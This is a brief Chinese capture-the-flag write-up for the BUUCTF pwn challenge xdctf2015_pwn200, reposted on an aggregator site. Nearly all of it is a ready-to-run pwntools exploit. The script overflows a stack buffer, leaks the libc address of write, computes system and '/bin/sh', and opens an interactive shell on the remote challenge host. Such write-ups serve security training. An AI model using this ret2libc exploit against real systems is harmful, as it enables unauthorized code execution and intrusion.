[BUUCTF-pwn]——xdctf2015_pwn200

一個簡單的ret2libc的題目， 前面寫了不少了這里只給exp了

exploit

from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27025) elf = ELF('./bof') write_plt = elf.plt['write'] write_got = elf.got['write'] main = elf.symbols['main'] payload = 'a' * (0x6c + 4) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4)p.sendafter("to XDCTF2015~!\n",payload)write_addr = u32(p.recv(4)) log.success("write_addr ---->:" + hex(write_addr))libc = LibcSearcher("write",write_addr) libc_base = write_addr - libc.dump("write") info("libc_base -----> " + hex(libc_base)) sys_addr = libc_base + libc.dump("system") binsh = libc_base + libc.dump("str_bin_sh") payload = 'a' * (0x6c + 4) + p32(sys_addr) + p32(main) + p32(binsh)p.sendafter("to XDCTF2015~!\n",payload) p.interactive()

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——xdctf2015_pwn200的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。